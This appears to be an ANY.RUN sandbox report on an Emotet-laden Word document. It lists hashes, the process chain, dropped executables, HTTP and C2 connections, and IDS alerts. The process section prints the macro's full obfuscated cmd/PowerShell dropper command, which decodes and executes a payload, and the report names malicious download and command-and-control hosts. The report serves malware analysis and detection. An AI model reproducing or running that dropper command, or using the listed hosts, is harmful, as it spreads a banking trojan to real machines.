analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Fa_Num_1F428471.doc

Full analysis: https://app.any.run/tasks/4f391579-4b92-47b4-a63d-ba429ec47eb6
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 14, 2018, 20:22:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Carson-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 17:15:00 2018, Last Saved Time/Date: Tue Nov 13 17:15:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

E6A0EC0B174516FCF5B4F4DEBE3CA224

SHA1:

03C45E4370AEDF626BBE586201DFA08A4ECBA2AB

SHA256:

2074FC77244A06C505E78A81D8E97BB0869AA3F7812AADB2A8B8E8A1CF3C95EA

SSDEEP:

1536:ByJocn1kp59gxBK85fBt+a9ZR+YOMKBf+nE9KYFd1NoNrPJ+o2b79IpG4C+w:B341k/W48p+YOMKBf+nE9KYFd1NoNrPf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3184)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3184)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3052)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2824)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3052)
    • Application was dropped or rewritten from another process

      • lpiograd.exe (PID: 2532)
      • 614.exe (PID: 2456)
      • lpiograd.exe (PID: 3900)
      • 614.exe (PID: 3568)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 2532)
    • Emotet process was detected

      • lpiograd.exe (PID: 3900)
    • Connects to CnC server

      • lpiograd.exe (PID: 2532)
    • EMOTET was detected

      • lpiograd.exe (PID: 2532)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • CMD.exe (PID: 2056)
    • Creates files in the user directory

      • powershell.exe (PID: 3052)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3052)
      • 614.exe (PID: 2456)
    • Connects to unusual port

      • lpiograd.exe (PID: 2532)
    • Starts itself from another location

      • 614.exe (PID: 2456)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3184)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Carson-PC
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:13 17:15:00
ModifyDate: 2018:11:13 17:15:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 614.exe no specs 614.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3184"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Fa_Num_1F428471.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2056CMD /c C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd^&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( ^&", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2824C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( &", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')"C:\windOws\sYstem32\cmd.exeCMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3052poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) | & ( \"{0}{1}\" -f 'iE','X')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3568"C:\Users\admin\AppData\Local\Temp\614.exe" C:\Users\admin\AppData\Local\Temp\614.exepowershell.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
2456"C:\Users\admin\AppData\Local\Temp\614.exe"C:\Users\admin\AppData\Local\Temp\614.exe
614.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
3900"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
614.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
2532"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Version:
8.0.0.0
Total events
1 731
Read events
1 312
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
3184WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C83.tmp.cvr
MD5:
SHA256:
3052powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5JB0QKW33W24FXCFEXOJ.temp
MD5:
SHA256:
3052powershell.exeC:\Users\admin\AppData\Local\Temp\614.exeexecutable
MD5:BBBA81368267A5A2BB2AC77853B8C78B
SHA256:667CDA76B582C0771F85AD12167238E0F4BB12F479030D99C8A15D7F08EB9975
3052powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a482.TMPbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
2456614.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:BBBA81368267A5A2BB2AC77853B8C78B
SHA256:667CDA76B582C0771F85AD12167238E0F4BB12F479030D99C8A15D7F08EB9975
3052powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3184WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:DE73CD16372B15BAEB295705CB5C0665
SHA256:F632D480D71035637003454848418369904B60666AF3749E2E13E876AD4467D0
3184WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_Num_1F428471.docpgc
MD5:9CB09D5C76645B786B452568AF62DC57
SHA256:9ECCD735A8A6968FA0FEB8501A4E36B4C0D8B9F1B6A118C04ECB9A5B3BDA97B6
3184WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lextext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3052
powershell.exe
GET
200
204.152.208.130:80
http://akucakep.com/JhVWKzotm/
US
executable
412 Kb
malicious
2532
lpiograd.exe
GET
200
50.78.167.65:7080
http://50.78.167.65:7080/
US
binary
132 b
malicious
3052
powershell.exe
GET
301
204.152.208.130:80
http://akucakep.com/JhVWKzotm
US
html
1.12 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3052
powershell.exe
204.152.208.130:80
akucakep.com
QuadraNet, Inc
US
suspicious
2532
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious

DNS requests

Domain
IP
Reputation
akucakep.com
  • 204.152.208.130
malicious

Threats

PID
Process
Class
Message
3052
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3052
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3052
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3052
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2532
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info